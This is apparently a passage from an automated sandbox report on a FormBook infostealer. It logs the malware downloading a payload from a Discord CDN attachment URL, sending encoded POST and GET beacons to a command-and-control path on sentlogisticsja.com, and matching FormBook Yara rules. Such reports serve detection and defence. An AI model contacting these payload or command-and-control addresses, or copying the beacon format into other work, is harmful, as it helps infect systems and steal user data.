52 44 32 37 35 33 78 44 53 71 7a 28 51 45 56 69 32 32 41 78 66 4b 4e 79 6b 4d 66 41 78 4d 41 77 78 7a 34 58 49 63 6d 42 53 39 69 32 4d 28 5a 65 66 35 2d 75 43 39 4c 63 4d 6c 6e 39 39 77 2d 31 4f 52 4c 47 65 56 6c 43 77 47 32 34 5a 66 6c 56 32 69 55 4e 34 6c 59 75 65 58 70 72 77 6b 47 49 56 42 6e 4f 52 47 34 50 51 62 49 41 74 4d 4f 48 74 5a 41 62 75 77 38 34 46 55 67 64 59 66 31 6d 32 48 38 65 5f 37 56 78 79 70 36 63 4b 41 44 65 4d 61 37 70 61 45 32 4e 75 68 75 30 77 77 4e 30 7a 4c 74 51 2d 42 6a 62 41 4b 70 73 45 4f 43 48 73 70 76 77 43 79 66 47 74 4a 39 75 61 57 56 30 77 51 4e 51 59 39 46 6a 61 43 43 51 4b 46 5a 72 6f 6f 31 41 4a 36 75 76 46 38 48 58 76 78 41 67 53 68 51 39 63 71 55 31 52 59 6f 73 38 68 63 7e 4f 51 6e 63 4f 76 44 4f 46 6f 6f 74 53 28 7a 5a 4d 64 42 78 30 57 2d 56 69 4c 78 37 51 69 58 63 58 46 63 48 56 63 44 72 41 42 66 50 76 4a 53 43 58 39 6a 47 32 53 56 4d 58 71 66 4c 61 63 47 44 6d 6a 4c 74 70 7a 65 32 63 59 52 71 6f 70 31 41 6a 68 66 63 79 69 5f 70 55 4c 4c 58 76 44 66 63 38 43 61 62 57 47 66 65
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 19:23:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
                Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmpString found in binary or memory: http://www.sentlogisticsja.com
                Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmpString found in binary or memory: http://www.sentlogisticsja.com/m9g2/
                Source: unknownHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 97Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 11Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 85Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2

                E-Banking Fraud:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.